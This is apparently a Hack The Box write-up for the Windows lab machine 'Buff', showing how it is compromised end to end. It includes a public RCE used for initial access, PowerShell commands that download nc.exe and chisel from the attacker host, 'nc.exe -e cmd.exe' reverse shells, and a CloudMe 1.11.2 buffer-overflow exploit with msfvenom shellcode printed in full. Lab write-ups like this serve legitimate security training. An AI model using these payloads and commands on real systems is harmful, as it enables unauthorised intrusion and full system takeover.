# Table of Contents

- 1 Summary  
- 2 Box Information  
- 3 Recon  
  - 3.1 http - 8080  
- 4 Exploitation  
- 5 Privilege Escalation  
  - 5.1 Manual Enumeration  
  - 5.2 Exploitation of CloudMe 1.11.2  
    - 5.2.1 Customizing the exploit  
    - 5.2.2 Port forward to make the exploit work  
    - 5.2.3 Running the exploit

# Summary

There was a http server on port 8080 which ran Gym Management Software 1.0. I used a premade exploit for this program in order to get a shell on the box.  
After a lot of enumeration I found CloudMe_1112.exe in the user's Downloads directory. There was a buffer overflow exploit available on exploitdb for this software.  
I modified the shellcode and forwarded the 8888 port from the target to my attacker machine in order to be able to run the exploit. I ran it and I got access to the administrator user.

# Box Information

    Name:       | Buff
    OS:         | Windows
    Difficulty: | Easy
    Points:     | 20
    Release:    | 18 Jul 2020
    IP:         | 10.10.10.198

# Recon

Nmap(TCP): 

    nmap -sC -sV -T4 -p- 10.10.10.198 -oA scans/nmap.full

- This box was very slow so I started manually guessing ports  
- Started from 80->443->8080 which was working so I took a look at 8080

Now, I finally ran an nmap scan on this after it got retired:

```
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 08:49 CET
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.32% done; ETC: 08:54 (0:01:14 remaining)
Nmap scan report for 10.10.10.198
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.30 seconds
```

- TL;DR: Port **8080** is open.

## http - 8080

The webpage mentions a 'CMS' which is currently used. After a simple exploit-db search I found out there is an **unauthenticated RCE** script.

![contactpage](img/contactpage.png)

- *Gym Management Software 1.0*

![exploitdb_gym](img/exploitdb_gym.png)

[https://www.exploit-db.com/exploits/48506](https://www.exploit-db.com/exploits/48506)

- local copy: [48506](expl/gym_management_rce.py)


# Exploitation

I downloaded the exploit and ran it without editing anything in the source. And I got a shell.

```
python2 expl/gym_management_rce.py 'http://10.10.10.198:8080/'
```

![gotuser_shaun](img/gotuser_shaun.png)

```
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami

buff\shaun
```

I uploaded an `nc.exe` (which has -e option) in order to get a normal reverse shell.

```
powershell.exe -exec bypass -c "Invoke-WebRequest 'http://10.10.14.192/nc.exe' -OutFile 'nc.exe'"
```

![ps_uploaded_nc](img/ps_uploaded_nc.png)

Target box:

```
nc.exe -e cmd.exe 10.10.14.192 1337
```

![nc_gotshell](img/nc_gotshell.png)

I got a hit:

```
listening on [any] 1337 ...
connect to [10.10.14.192] from (UNKNOWN) [10.10.10.198] 52677
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
```

I was able to type out the user flag(`C:\Users\shaun\Desktop\user.txt:b6431----------------------6fa5a`)

# Privilege Escalation

## Manual Enumeration

After some manual enumeration(a lot of dir listings) I found an executable in the user's Downloads directory!

![cloudmeexe](img/cloudmeexe.png)

```
C:\Users\shaun>dir Downloads
dir Downloads
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   8,036,261,888 bytes free

C:\Users\shaun>
```

There is a buffer overflow for CloudMe 1.11.2 in exploitdb.

![cloudme_expldb](img/cloudme_expldb.png)

I used the most simple(PoC one):

https://www.exploit-db.com/exploits/48389

- local copy: [48389](expl/cloudme.py)


## Exploitation of CloudMe 1.11.2

### Customizing the exploit

I have to customize the shellcode in order to be able to open a reverse shell.

The standard `windows/shell_reverse_tcp` didn't work so I used `windows/exec` with my previously uploaded nc.exe.

```
msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
```

cloudme.py:

```py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xb8\x17\xe4\x16\xfc\xdd\xc1\xd9\x74\x24\xf4\x5a\x29"
payload += b"\xc9\xb1\x3e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2"
payload += b"\xe2\x18\xfe\x7e\x0c\xe1\xff\x1e\x85\x04\xce\x1e\xf1"
payload += b"\x4d\x61\xaf\x72\x03\x8e\x44\xd6\xb0\x05\x28\xfe\xb7"
payload += b"\xae\x87\xd8\xf6\x2f\xbb\x18\x98\xb3\xc6\x4c\x7a\x8d"
payload += b"\x08\x81\x7b\xca\x75\x6b\x29\x83\xf2\xd9\xde\xa0\x4f"
payload += b"\xe1\x55\xfa\x5e\x61\x89\x4b\x60\x40\x1c\xc7\x3b\x42"
payload += b"\x9e\x04\x30\xcb\xb8\x49\x7d\x82\x33\xb9\x09\x15\x92"
payload += b"\xf3\xf2\xb9\xdb\x3b\x01\xc0\x1c\xfb\xfa\xb7\x54\xff"
payload += b"\x87\xcf\xa2\x7d\x5c\x5a\x31\x25\x17\xfc\x9d\xd7\xf4"
payload += b"\x9a\x56\xdb\xb1\xe9\x31\xf8\x44\x3e\x4a\x04\xcc\xc1"
payload += b"\x9d\x8c\x96\xe5\x39\xd4\x4d\x84\x18\xb0\x20\xb9\x7b"
payload += b"\x1b\x9c\x1f\xf7\xb6\xc9\x12\x5a\xdd\x0c\xa1\xe0\x93"
payload += b"\x0f\xb9\xea\x83\x67\x88\x61\x4c\xff\x15\xa0\x28\x0f"
payload += b"\x5c\xe9\x19\x98\x38\x7b\x18\xc5\xbb\x51\x5f\xf0\x3f"
payload += b"\x50\x20\x07\x5f\x11\x25\x43\xd8\xc9\x57\xdc\x8c\xed"
payload += b"\xc4\xdd\x85\xad\xd0\x7d\x5d\x53\x48\x0e\xed\xcf\xfa"
payload += b"\x9a\x69\x9f\x99\x11\x2d\x38\x27\xbb\x91\xb3\xa7\x2f"
payload += b"\x46\x5d\x2c\xec\xf6\xfe\x82\x69\x7e\x64\xfb\x5c\x1b"
payload += b"\x46\x98\xf3\x87\xa8\x3b\x74\x22\x95\xf2\xb4\x82\xe4"
payload += b"\xc4\x9a\xeb\x32\x0b\xd2\x32\x09\x73\x25\x77\x5e\x4b"
payload += b"\x45"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8889))
	s.send(buf)
except Exception as e:
	print("RIP")
```

- **Note:** If the vpn ip changes the shellcode must be rebuilt.

### Port forward to make the exploit work

Since there were no python on the box I had to forward the 8888 port to my box then run the exploit locally.

I used [chisel](https://github.com/jpillora/chisel/releases/tag/v1.6.0) in order to make the port forwarding.

- I downloaded both [windows](https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_windows_amd64.gz) and [linux](https://github.com/jpillora/chisel/releases/download/v1.6.0/chisel_1.6.0_linux_amd64.gz) versions

I created a server on my kali machine:

```
./chisel_1.6.0_linux_amd64 server -p 1080 --reverse
```

![chisel_server](img/chisel_server.png)

I uploaded the windows executable to the box:

```
powershell.exe -exec bypass -c "Invoke-WebRequest 'http://10.10.14.192/chisel_1.6.0_windows_amd64' -OutFile 'chisel.exe'"
```

![ps_uploaded_chisel](img/ps_uploaded_chisel.png)

On the target windows box I ran the downloaded chisel.exe in client mode:

```
chisel.exe client 10.10.14.192:1080 R:8889:127.0.0.1:8888
```

![chisel_client](img/chisel_client.png)

I also got some output on the server:

![chisel_server_connected](img/chisel_server_connected.png)

- It's successfully connected

### Running the exploit

I used python2 to run the script:

```
python2 cloudme.py
```

Chisel server output:

![chisel_server_connection](img/chisel_server_connection.png)

```
2020/07/19 19:55:58 server: proxy#1:R:0.0.0.0:8889=>127.0.0.1:8888: conn#2: Open
2020/07/19 19:55:59 server: proxy#1:R:0.0.0.0:8889=>127.0.0.1:8888: conn#2: Close (sent 1.5KB received 0B)
```

My nc listener:

![gotuser_root](img/gotuser_root.png)

```
nc -lvnp 1338

connect to [10.10.14.192] from (UNKNOWN) [10.10.10.198] 50275
Microsoft Windows [Version 10.0.17134.1550]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator
```

I got the administrator user so I also have access to the root flag(`C:\Users\Administrator\Desktop\root.txt:05759----------------------1aaad`)

